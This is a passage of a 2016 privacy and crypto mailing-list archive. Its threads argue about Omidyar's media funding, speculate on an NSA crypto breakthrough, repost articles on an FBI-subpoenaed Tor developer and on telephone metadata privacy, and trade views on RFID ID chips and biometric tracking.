23:15:57 +0200 Subject: What Omidyar's been up to... In-Reply-To: References: <5739E8C0.6090001@riseup.net> <573aad9a.024e370a.977df.1aba@mx.google.com> <573B3528.1040703@riseup.net> <573b7bec.8550370a.ca9c6.ffff8780@mx.google.com> Message-ID: Thank you rayzor for your ignorant ego ways otherwise we wouldnt get to read juans brilliance as often On May 17, 2016 11:20 PM, "juan" wrote: On Tue, 17 May 2016 08:13:44 -0700 Rayzer wrote: > > > On 05/16/2016 10:36 PM, juan wrote: > > On Mon, 16 May 2016 08:35:28 -0700 > > Rayzer wrote: > > > >> > >> Fomenting media about indigenous land rights... > >> > >> > > > > omidyar and the reuters mafia babbling about 'land rights' make as > > much sense as jack the ripper lecturing on morality. > > > > > > I sense you, like many fanatics, don't see the value of the 'small > cracks' these sorts of things make in 'systems'. Oh, I do see the value of what your master omidyar does. I know qute well how propaganda works. The 'cracks' in the system are useful to keep the fake opposition happy. "Controlled opposition" Look it up. In wikipedia. > Let's talk conspiracy Juan, cause I KNOW you're bound to be one of > those 'conspiracy nutjobs'. Ok. So I'm a 'fanatic nutjob'. I'd rather be that instead of an omidyar lapdog. > > "Power Elite Conspiracies" exist but they are NOT overarching, cast > in stone things with some 'plan' that made them happen. Conspiracies > muddle through by hedging all bets. Any way the cards fall you win > SOMETHING, and over time that something is at least additive if not > geometrically or logarithmically enhanced. Handwaving and bullshit. > > It's up to the proles to take advantage of the hedges that work for > them. Because no one else is going to do it. Even the most perverse > skewed reporting on an issue is better than none at all for too many > reasons to enumerate here. Sure, sure, sure. How could I have missed the invaluable value of establishment propaganda? Silly me. > > If the proles can't figure out the media trap their ensnared in > educate them. You'd just scoff. Hella solution. > > "I think people have the capacities to see through the deceit in which > they're ensnared, but you've got to make the effort" ~Noam Chomsky > > He says so right here > > https://www.youtube.com/watch?v=aIsZwGbi9g8 > (snigger, that's Tom Morello's mama announcing.) > > Ah but you think Chomsky's a CIA 'operator' don't you Juan? I know chomsky is a sick piece of shit. I aldready provided the data. Here it goes again. http://www.hoover.org/research/noam-chomsky-closet-capitalist http://www.celebritynetworth.com/richest-celebrities/authors/noam-chomsky-net-worth/ > And Tom Morello, and Zack De La Rocha, and Abbie Hoffman Karl Marx, > Groucho Marx, and Trotsky too. lol rayzer - you are a cheap marxist - you can't get more totalitarian than that. go kill people who don't obey The State's Traffic Laws. > > I guess everyone should just give up and not do anything at all. > > BTW, USAID is on the list of foundation donors. The skew is EASY to > see, and EASY to work around just by those agency's visibility in the > organization. > > Rr > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4870 bytes Desc: not available URL: From zen at freedbms.net Tue May 17 17:49:53 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 18 May 2016 00:49:53 +0000 Subject: What Omidyar's been up to... In-Reply-To: <573b9e4b.88c48c0a.2060f.ffff9c97@mx.google.com> References: <5739E8C0.6090001@riseup.net> <573aad9a.024e370a.977df.1aba@mx.google.com> <573B3528.1040703@riseup.net> <573b7bec.8550370a.ca9c6.ffff8780@mx.google.com> <573b9e4b.88c48c0a.2060f.ffff9c97@mx.google.com> Message-ID: On 5/17/16, juan wrote: > You certainly don't need me to tell you that omidyar isn't a > freedom fighter Well, at least this fight's not a difficult one :D From grarpamp at gmail.com Tue May 17 22:31:21 2016 From: grarpamp at gmail.com (grarpamp) Date: Wed, 18 May 2016 01:31:21 -0400 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: On 5/17/16, juan wrote: > I'll hazard : 20 years. Nope, sorry, you're already effectively chipped. And considered cattle. Best you can do now is try to cast off your chains. From carimachet at gmail.com Tue May 17 18:11:20 2016 From: carimachet at gmail.com (Cari Machet) Date: Wed, 18 May 2016 03:11:20 +0200 Subject: What Omidyar's been up to... In-Reply-To: References: <5739E8C0.6090001@riseup.net> <573aad9a.024e370a.977df.1aba@mx.google.com> <573B3528.1040703@riseup.net> <573b7bec.8550370a.ca9c6.ffff8780@mx.google.com> <573b9e4b.88c48c0a.2060f.ffff9c97@mx.google.com> Message-ID: btw there is no deserve On Wed, May 18, 2016 at 2:49 AM, Zenaan Harkness wrote: > On 5/17/16, juan wrote: > > You certainly don't need me to tell you that omidyar isn't a > > freedom fighter > > Well, at least this fight's not a difficult one :D > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1833 bytes Desc: not available URL: From grarpamp at gmail.com Wed May 18 03:36:12 2016 From: grarpamp at gmail.com (grarpamp) Date: Wed, 18 May 2016 06:36:12 -0400 Subject: NSA Crypto Breakthrough Bamford [was: WhatsApp keying...] Message-ID: On 4/29/16, Ray Dillinger wrote: > > On 04/28/2016 05:41 PM, grarpamp wrote: >> On 4/28/16, david wong wrote: >>> so as long as we don't discover a crazy breakthrough. >> >> This "breakthrough" hasn't yet been further identified / described... >> https://www.wired.com/2012/03/ff_nsadatacenter > > > I keep hearing rumors about this "breakthrough." I don't > know how seriously to take them, but I suspect that if it > exists it's more likely to be deliberate sabotage at the > hardware/software/firmware level than it is to be the > often-implicated Quantum Supercomputer or major mathematical > insight. > But I keep hearing noises about a fundamental breakthrough > in cryptology, with the strong implication that it's some > kind of new cryptanalytic technique, mathematical insight, > or design principle for special-purpose custom hardware. If you actually read and reassemble all the references in the article (which I won't do herein), they all refer to a 'cryptanalytic' breakthrough over modern crypto, further assisted with compute power, and deployed. That is obviously not just academic powers of two yielding moot partial solutions over limited rounds. And not sabotage, exploits, etc. Of course those are widespread, but they are not part of the 'cryptanalytic breakthrough' subthread of the article. > Assuming they can get four orders of magnitude of hardware > efficiency for purpose-built AES cracking silicon, and back > it up with scores of billions of dollars per year investment > in constantly updating overwhelming volumes of this custom > hardware -- I still don't see anybody cracking AES-128 any > time soon without either a mathematical insight so profound > as to be completely unexpected Maths and crackpots love a nice quiet life with everything taken care of so they can spend decades working their hard problems and crazy angles. The NSA provides that, and protects it and its results as their crown jewels. Do not underestimate it. > or a fundamentally new > computing technology like large scale Quantum Computers. This begins to matter when basic research yields a point where a secret investment of say $100B or less pays off. https://en.wikipedia.org/wiki/Quantum_computing https://en.wikipedia.org/wiki/List_of_megaprojects http://www.visualcapitalist.com/death-taxes-2015-visual-guide-tax-dollars-go/ > If the fundamental mathematical breakthrough is real, it's > very surprising that it hasn't leaked See crown jewels... > or been duplicated yet See Maths... > but in that case it's only a matter of time before one or the > other or both occur. Leaks can occur until time forgotten. Math occurs randomly. Snowden did not have access to the crypto compartments. No leaker seems to have had relavent access to post-WWII modern crypto. > Speculating about the effect of a > fundamental mathematical breakthrough is at best hard to do > meaningfully Those subject to the dark must speculate, those with knowledge of it can execute. > Physicists: > "A large-scale quantum supercomputer is very doubtful." > > Mathematicians: > "A mathematical insight of such magnitude is very doubtful." Wagering against physics is one thing, against the human mind... that may not be a wise investment. "...the ability to crack current public encryption." Some investigative journalist should be all over following up the crypto part of Bamford's piece as the scoop of a lifetime. For that matter, where is Bamford's own followup? Details of such a breakthrough are likely to serve and advance public knowledge and application by providing solution to some long desirable hard problem or going off somewhere new that we've never gone before. Keeping those kind of secrets for yourself is an affront to Humankind. Till then, everyone, including the keepers, rots in the Dark Ages. From rayzer at riseup.net Wed May 18 09:59:07 2016 From: rayzer at riseup.net (Rayzer) Date: Wed, 18 May 2016 09:59:07 -0700 Subject: Subpoenaed Tor developer dodges FBI, leaves US Message-ID: <573C9F5B.2030201@riseup.net> Money.Cnn. See article for links n shit: http://money.cnn.com/2016/05/17/technology/tor-developer-fbi/index.html "The FBI's attempts to break into Tor are starting to manifest in strange ways. FBI agents are currently trying to subpoena one of Tor's core software developers to testify in a criminal hacking investigation, CNNMoney has learned. But the developer, who goes by the name Isis Agora Lovecruft, fears that federal agents will coerce her to undermine the Tor system -- and expose Tor users around the world to potential spying. That's why, when FBI agents approached her and her family over Thanksgiving break last year, she immediately packed her suitcase and left the United States for Germany. "I was worried they'd ask me to do something that hurts innocent people -- and prevent me from telling people it's happening," she said in an exclusive interview with CNNMoney. The FBI declined to comment on the matter, citing a policy to neither confirm nor deny the existence of ongoing investigations. However, according to an FBI agent familiar with the case, FBI agents in Atlanta and Los Angeles are seeking Lovecruft's help to investigate a hacking case in which she, in their eyes, is "connected." The Electronic Frontier Foundation, which advocates for Internet freedom, has now taken up her cause. "Her primary goal is to make sure she can come back to the United States when she wants to do that," said Nate Cardozo, a senior staff attorney at EFF. "And to have threats of subpoenas explained or go away." "Please call me" It started when FBI Special Agent Mark W. Burnett stopped by Lovecruft's parents' home in Los Angeles while the family was on vacation in Hawaii. He left his card, on which he wrote, "Please call me." Her mother immediately called Ben Rosenfeld, an attorney in San Francisco who specializes in technology and surveillance law. On Dec. 2, he called Agent Burnett and presented himself as Lovecruft's lawyer. Lovecruft told CNNMoney she had been willing to meet the FBI with her attorney present. But Rosenfeld was told by agents that they would circumvent him and approach Lovecruft directly. At the time, the FBI wouldn't say why it sought her. There were clues, though. In late 2015, it was becoming apparent that the FBI was aggressively trying to pierce Tor's veil of anonymity. Tor hides someone's physical location by bouncing computer signals throughout its worldwide network. And while it's run by a U.S. government-backed nonprofit to protect free speech, Tor is also a preferred tool for hackers, drug traffickers, and child pornographers. The FBI has managed to hack Tor users in the past. To pull this off, the FBI has also compelled institutions, like Carnegie Mellon University, to pitch in. Lovecruft, one of the few people intimately familiar with Tor's inner workings, feared she would be pressured to assist as well. "That would undermine all the work that we do to protect human rights activists, women researching birth control... all these people need privacy. They need what Tor provides," she said. "I would not undermine that." Lovecruft thought she'd get caught up in the FBI's perceived war on hackers. The Department of Justice has come down hard on digital dissidents like Aaron Swartz, who committed suicide when facing federal charges in 2013. Fearing a similar fight, Lovecruft refused to leave her San Francisco apartment for a week. "There was this feeling the air had changed, and that I couldn't breathe," she said. "I'd look at my bike and think, I'm not supposed to go outside. Maybe some agents will pick me up off the street if I ride my bike. I'm just going to stay here, and not respond to anyone when they knock." Flight to Berlin Lovecruft had intended to move to Germany someday, but she put those plans on overdrive. She booked a flight to Berlin that weekend, including a return flight she had no intention of taking -- just to avoid raising suspicions. On Dec. 7, without seeing family or friends, she took a taxi to San Francisco International Airport. She nervously made her way past TSA agents wearing a $1 pair of blue-green aviator sunglasses, unsure if she was breaking any laws by leaving the country. When the plane lifted from the tarmac, Lovecruft sent a message on Twitter, letting loved ones know she slipped away. But it's not over. In April, FBI Special Agent Kelvin Porter in Atlanta called her lawyer. This time, he wanted to know where to send a subpoena for Lovecruft to help testify in a criminal hacking case. Cardozo at the EFF is adamant that Lovecruft hasn't violated the law by dodging the FBI. He and Lovecruft acknowledge that the FBI might have a legitimate reason to seek her help. But they just want to figure out what that is. Lovecruft, speaking from Berlin by phone on an encrypted app, still sounds worried: "I don't know what they want. I don't know what happens to me if I go back." CNNMoney (New York) First published May 17, 2016: 8:44 AM ET -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rayzer at riseup.net Wed May 18 10:02:09 2016 From: rayzer at riseup.net (Rayzer) Date: Wed, 18 May 2016 10:02:09 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: <573CA011.6080307@riseup.net> On 05/17/2016 10:31 PM, grarpamp wrote: > On 5/17/16, juan wrote: >> I'll hazard : 20 years. > Nope, sorry, you're already effectively chipped. > And considered cattle. > Best you can do now is try to cast off your chains. > +1 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rayzer at riseup.net Wed May 18 10:07:06 2016 From: rayzer at riseup.net (Rayzer) Date: Wed, 18 May 2016 10:07:06 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: <573CA13A.4020502@riseup.net> On 05/18/2016 03:11 AM, Cari Machet wrote: > > Yes the little talks of whats his name @ioerror limited hang out tor guy > > He takes out the battery from his phone and presents that as effective > for disabling tracking > He also says to put in the fucking fridge and shut the door. You and Juan would probably open it because you don't believe the light goes out. Arh Arh. > Sim cards are detectible without power > > I really dislike these kinds of performances for show that lie > > On May 18, 2016 8:37 AM, "grarpamp" > wrote: > > On 5/17/16, juan > > wrote: > > I'll hazard : 20 years. > > Nope, sorry, you're already effectively chipped. > And considered cattle. > Best you can do now is try to cast off your chains. > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2092 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From carimachet at gmail.com Wed May 18 03:11:55 2016 From: carimachet at gmail.com (Cari Machet) Date: Wed, 18 May 2016 12:11:55 +0200 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: Yes the little talks of whats his name @ioerror limited hang out tor guy He takes out the battery from his phone and presents that as effective for disabling tracking Sim cards are detectible without power I really dislike these kinds of performances for show that lie On May 18, 2016 8:37 AM, "grarpamp" wrote: On 5/17/16, juan wrote: > I'll hazard : 20 years. Nope, sorry, you're already effectively chipped. And considered cattle. Best you can do now is try to cast off your chains. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 932 bytes Desc: not available URL: From drwho at virtadpt.net Wed May 18 12:51:46 2016 From: drwho at virtadpt.net (The Doctor) Date: Wed, 18 May 2016 12:51:46 -0700 Subject: LMAO at linux In-Reply-To: References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> <20160516161327.GA26643@tau1.ceti.pl> <20160516105631.17914e379af7c85e7658ec0a@virtadpt.net> Message-ID: <20160518125146.3d41aab8e7d7a253d9a4036b@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On Wed, 18 May 2016 18:15:41 +0000 Sean Lynch wrote: > looking for almost exactly this. The one drawback seems to be that, at > least without some coding, it can only save through the browser to local > disk or to a custom server, no WebDAV support or anything like that. It'd It was designed explicitly to be serverless. I've never tried saving it to WebDAV; it'd be worth a couple of experiements, I think. I know people who save theirs to Dropbox and then share public read-only links to same and it seems to do what they want it to. Twine applications, also. > be nice to save to Tahoe-LAFS or something along those lines. As I understand Tahoe-LAFS, it's a filesystem, so you should be able to save it and be done with it. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Just a moment - my muse is speaking to me." --Citizen G'Kar -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXPMfSAAoJED1np1pUQ8RkOVAQAITX4v5yxVECTN97qLp+juG+ lQJWVw4DNvGf9muNoVQm70fGGPjCNJxPhZYKs0u/pk+P1TtdxLobGF84Bw2jEmDm tFXQcSvZE9wTysj4AyIv6Mq3MNWriLzNI1tpt3vyb6G7PY1ZSg4H8VYC0jhfeQiQ TeLruEeSt7YTmk92xWGn1T4BoI0CmPZQpu8mma8MXYnOjr+84abluI8MyZ9IXoQB D15wD3oftVeylNP+2UB9YCl/Hu2MzQSkSpiPlzv3tV2CsOkvrjF8TBE90BQBIszg 3WH+eeAH3Rv/Rv/cfSV2mL/8Ut/eG/lSyeXkII/rk3/QwjM3Tw9SSt3c0Z0bWM1V j5zoPbkQwQs/rHPBwFIE07oQKf8q1jKoetjWQczKrkWHF1Px4ULnWeP0z+3MV2qh lM2VU0ed9+DaGywO0j49mDJNZZcnV4ep/B6gAG995Mj4FgGm2uBNvPBZuEWXgWhA /5PIksosNOa3QfXlhveaB89EceOuHU75b5p7C7Dalwr1cx+1/rDy4eZcNtfwEqIl QJnU/3l7pFWTjmyMFpk+ZS1mEbPZTLeLc1OIF/eh2Bgzbh9GJRf4N8qpQN3g8iru Y97ZqnQZREcNf2pzqnx4/Zh2ToPGLy6n2DIE4GaLBxV+rJH1zoTzV7fFtjJdSqvT DhkkmnX+1oXgw4laYd5K =uHF0 -----END PGP SIGNATURE----- From juan.g71 at gmail.com Wed May 18 10:54:59 2016 From: juan.g71 at gmail.com (juan) Date: Wed, 18 May 2016 14:54:59 -0300 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: <573cac42.528f8c0a.db4dd.14d0@mx.google.com> On Wed, 18 May 2016 01:31:21 -0400 grarpamp wrote: > On 5/17/16, juan wrote: > > I'll hazard : 20 years. > > Nope, sorry, you're already effectively chipped. > And considered cattle. I think I know about the cattle status. I also know about cell phones. But cell phones are not put inside people (yet) nor mandatory (yet). So, you're not really anwswering the question (answering is not mandatory anyway) > Best you can do now is try to cast off your chains. From seanl at literati.org Wed May 18 11:15:41 2016 From: seanl at literati.org (Sean Lynch) Date: Wed, 18 May 2016 18:15:41 +0000 Subject: LMAO at linux In-Reply-To: <20160516105631.17914e379af7c85e7658ec0a@virtadpt.net> References: <57366151.06e28c0a.d5844.ffff86ff@mx.google.com> <20160515165513.807590f56de03b56f6ea122f@virtadpt.net> <20160516161327.GA26643@tau1.ceti.pl> <20160516105631.17914e379af7c85e7658ec0a@virtadpt.net> Message-ID: On Mon, May 16, 2016 at 11:04 AM The Doctor wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On Mon, 16 May 2016 18:13:27 +0200 > Tomasz Rola wrote: > > > I hear that org-mode is modern replacement for this... Actually, after > > spending good time with org I would rather not go back to notes.txt. > > In recent years I've been using Tiddlywiki (http://tiddlywiki.com/) to > manage > notes for my projects, and I'm quite taken with it. I keep them checked > into > the appropriate Git repositories so not only are they versioned but they > get > pushed to my server along with the code. > > Tiddlywiki looks pretty neat. Thanks for mentioning it. I've actually been looking for almost exactly this. The one drawback seems to be that, at least without some coding, it can only save through the browser to local disk or to a custom server, no WebDAV support or anything like that. It'd be nice to save to Tahoe-LAFS or something along those lines. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1446 bytes Desc: not available URL: From carimachet at gmail.com Wed May 18 16:12:36 2016 From: carimachet at gmail.com (Cari Machet) Date: Thu, 19 May 2016 01:12:36 +0200 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573cac42.528f8c0a.db4dd.14d0@mx.google.com> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573cac42.528f8c0a.db4dd.14d0@mx.google.com> Message-ID: itsa variable On Wed, May 18, 2016 at 7:54 PM, juan wrote: > On Wed, 18 May 2016 01:31:21 -0400 > grarpamp wrote: > > > On 5/17/16, juan wrote: > > > I'll hazard : 20 years. > > > > Nope, sorry, you're already effectively chipped. > > And considered cattle. > > I think I know about the cattle status. > > I also know about cell phones. But cell phones are not > put inside people (yet) nor mandatory (yet). So, you're not > really anwswering the question (answering is not mandatory > anyway) > > > > Best you can do now is try to cast off your chains. > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2350 bytes Desc: not available URL: From zen at freedbms.net Wed May 18 23:36:38 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Thu, 19 May 2016 06:36:38 +0000 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: On 5/18/16, juan wrote: > I'll hazard : 20 years. > > http://www.bbc.com/news/uk-35972480 : -> dogs - now in some places -> prison inmates +X years -> sex offenders +Y years -> everyone +Z years From carimachet at gmail.com Wed May 18 23:58:19 2016 From: carimachet at gmail.com (Cari Machet) Date: Thu, 19 May 2016 08:58:19 +0200 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: In germany the id card has a chip They can scan the crowd of a protest and id's can be read When we went on actions some would not carry id some tried to mask the chip ... with different metals... We need cloaking devices We need ideas for invisibility making On May 19, 2016 9:42 AM, "Zenaan Harkness" wrote: > On 5/18/16, juan wrote: > > I'll hazard : 20 years. > > > > http://www.bbc.com/news/uk-35972480 > > : > -> dogs - now in some places > -> prison inmates +X years > -> sex offenders +Y years > -> everyone +Z years > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1062 bytes Desc: not available URL: From rayzer at riseup.net Thu May 19 09:57:46 2016 From: rayzer at riseup.net (Rayzer) Date: Thu, 19 May 2016 09:57:46 -0700 Subject: Telephone metadata can reveal surprisingly sensitive personal information In-Reply-To: References: Message-ID: <573DF08A.4050809@riseup.net> Addenda... That ex-used furniture salesman (http://www.salon.com/2014/07/13/fbi_cyber_expert_is_ex_discount_furniture_salesman/) know whose metadata he's viewing too: Dec. 2013: “With “marginal effort,” they /(a Stanford graduate student and friends)/ matched more than 27 percent of the numbers using just Yelp, Google Places and Facebook … “Between Intelius, Google search and our three initial sources, we associated a name with 91 of the 100 numbers,” http://auntieimperial.tumblr.com/post/71327622408 On 05/19/2016 08:13 AM, Александр А. wrote: > /https://news.stanford.edu/2016/05/16/stanford-computer-scientists-show-telephone-metadata-can-reveal-surprisingly-sensitive-personal-information/ > > http://www.pnas.org/content/113/20/5536.full/ > > > Stanford computer scientists show telephone metadata can reveal > surprisingly sensitive personal information > > Stanford researchers show that telephone metadata – information about > calls and text messages, such as time and length – can alone reveal a > surprising amount of personal detail. The work could help inform > future policies for government surveillance and consumer data privacy. > > Most people might not give telephone metadata – the numbers you dial, > the length of your calls – a second thought. Some government officials > probably view it as similarly trivial, which is why this information > can be obtained without a warrant. > > A new Stanford study of information gathered by the National Security > Agency shows that warrantless surveillance can reveal a surprising > amount of personal information about individual Americans. (Image > credit: Sergey Nivens / Shutterstock ) > > But a new analysis > > by Stanford computer scientists shows that it is possible to identify > a person’s private information – such as health details – from > metadata alone. Additionally, following metadata “hops” from one > person’s communications can involve thousands of other people. > > The researchers set out to fill knowledge gaps within the National > Security Agency’s current phone metadata program, which has drawn > conflicting assertions about its privacy impacts. The law currently > treats call content and metadata separately and makes it easier for > government agencies to obtain metadata, in part because it assumes > that it shouldn’t be possible to infer specific sensitive details > about people based on metadata alone. > > The findings, reported today in the /Proceedings of the National > Academy of Sciences/, provide the first empirical data on the privacy > properties of telephone metadata. Preliminary versions of the work, > previously made available online, have already played a role in > federal surveillance policy and have been cited in litigation filings > and letters to legislators in both the United States and abroad. The > final work could be used to help make more informed policy decisions > about government surveillance and consumer data privacy. > > The computer scientists built a smartphone application that retrieved > the previous call and text message metadata – the numbers, times and > lengths of communications – from more than 800 volunteers’ smartphone > logs. In total, participants provided records of more than 250,000 > calls and 1.2 million texts. The researchers then used a combination > of inexpensive automated and manual processes to illustrate both the > extent of the reach – how many people would be involved in a scan of a > single person – and the level of sensitive information that can be > gleaned about each user. > > From a small selection of the users, the Stanford researchers were > able to infer, for instance, that a person who placed several calls to > a cardiologist, a local drugstore and a cardiac arrhythmia monitoring > device hotline likely suffers from cardiac arrhythmia. Another study > participant likely owns an AR semiautomatic rifle, based on frequent > calls to a local firearms dealer that prominently advertises AR > semiautomatic rifles and to the customer support hotline of a major > firearm manufacturer that produces these rifles. > > One of the government’s justifications for allowing law enforcement > and national security agencies to access metadata without warrants is > the underlying belief that it’s not sensitive information. This work > shows that assumption is not true. > > “I was somewhat surprised by how successfully we inferred sensitive > details about individuals,” said study co-author Patrick Mutchler, a > graduate student at Stanford. “It feels intuitive that the businesses > you call say something about yourself. But when you look at how > effectively we were able to identify that a person likely had a > medical condition, which we consider intensely private, that was > interesting.” > > They also found that a large number of people could get caught up in a > single surveillance sweep. When the National Security Agency examines > metadata associated with a suspect’s phone, it is allowed to examine a > “two-hop” net around the suspect. Suspect A calls person B is one hop; > person B calls person C is the second hop. Analysts can then comb the > metadata of anyone within two hops of the suspect. > > By extrapolating participant data, the researchers estimated that the > NSA’s current authorities could allow for surveilling roughly 25,000 > individuals – and possibly more – starting from just one “seed” phone > user. > > Although the results are not surprising, the researchers said that the > raw, empirical data provide a better-informed starting point for > future conversations between privacy interest groups and policymakers. > > For instance, the authors point to the recent shift to reduce the > metadata retrieval window from five years to 18 months. By drawing > accurate and sensitive inferences about participants from roughly six > months-worth of calls and texts, the study suggests that metadata are > more revealing than previously thought. > > Similarly, the government’s two-hop call sweep was previously three > hops; that reduction was implemented to reduce the number of people > caught in a sweep. Shortening the time window could reduce that number > further, Mutchler said. > > “If we’re going to pick a sweet spot as society, where we want the > privacy vs. security tradeoff to lie, it’s important to understand the > implications of the polices that we have,” Mutchler said. “In this > paper, we have empirical data, which I think will help people make > informed decisions.” > > The study, “Evaluating the privacy properties of telephone metadata,” > was coauthored by John C. Mitchell > , the Mary and Gordon > Crary Family Professor in the School of Engineering, and Jonathan > Mayer, a scholar in the Stanford School of Engineering and the > Stanford Law School. Mayer is currently detailed from Stanford to the > Federal Communications Commission, where he is serving as Chief > Technologist for the Enforcement Bureau. The project was supported in > part by the National Science Foundation Team for Research in > Ubiquitous Secure Technology Research Center. > > > > ** -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 15203 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From rayzer at riseup.net Thu May 19 10:02:54 2016 From: rayzer at riseup.net (Rayzer) Date: Thu, 19 May 2016 10:02:54 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: <573DF1BE.7030000@riseup.net> On 05/18/2016 11:58 PM, Cari Machet wrote: > > In germany the id card has a chip > > They can scan the crowd of a protest and id's can be read > > When we went on actions some would not carry id some tried to mask the > chip ... with different metals... > > We need cloaking devices > > We need ideas for invisibility making > > On May 19, 2016 9:42 AM, "Zenaan Harkness" > wrote: > > On 5/18/16, juan > > wrote: > > I'll hazard : 20 years. > > > > http://www.bbc.com/news/uk-35972480 > > : > -> dogs - now in some places > -> prison inmates +X years > -> sex offenders +Y years > -> everyone +Z years > My Social Security retirement fund 'Credit Card' has an rfid chip. They DO NOT issue checks anymore. They know their senior citizens are a threat and they want to track our purchasing patterns. Buy a little more fertilizer than your garden needs and wham-bam You're at Gitmo getting forced geritol enemas. Rr -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2145 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From zen at freedbms.net Thu May 19 03:36:09 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Thu, 19 May 2016 10:36:09 +0000 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> Message-ID: >> On 5/18/16, juan wrote: >> > I'll hazard : 20 years. >> > >> > http://www.bbc.com/news/uk-35972480 >> >> : >> -> dogs - now in some places >> -> prison inmates +X years >> -> sex offenders +Y years >> -> everyone +Z years On 5/19/16, Cari Machet wrote: > In germany the id card has a chip > > They can scan the crowd of a protest and id's can be read > > When we went on actions some would not carry id some tried to mask the chip > ... with different metals... > > We need cloaking devices > > We need ideas for invisibility making > On May 19, 2016 9:42 AM, "Zenaan Harkness" wrote: On slashdullits today, face recognition at around 70% - I assume this will only increase. Now imagine your local police at a local RBT stop, where the RBT machine scans your eye for your genetic eyeprint. When we're talking "mandatory chip implant" we're talking "control by law enforcement, military and other government entities at 'papers please!' checkpoints" such as RBT etc. With biometric ID, they need no chip. Build your local group of rights defenders or this tyranny will continue to systematically increase. The right of travel has been turned into a "get permission from govt with a 'license' to travel"; right to choose how when and where to medicate your body is soon to be taken (here in Australia, no jab, no pay, as in, you don't vaccinate your child, your social security blanket is taken); fluoride in the water also violates our right to choose how we medicate our bodies - without money, you will consume fluoride; right to communicate anonymously? well round here we're very familiar with the attacks on -that- human right. And the list goes on... From shelley at misanthropia.org Thu May 19 10:58:24 2016 From: shelley at misanthropia.org (Shelley) Date: Thu, 19 May 2016 10:58:24 -0700 Subject: How long before compulsory microchipping of cattle, I mean, 'citizens'? In-Reply-To: <573DF1BE.7030000@riseup.net> References: <573bbb9f.88c48c0a.2060f.ffffaa66@mx.google.com> <573DF1BE.7030000@riseup.net> Message-ID: 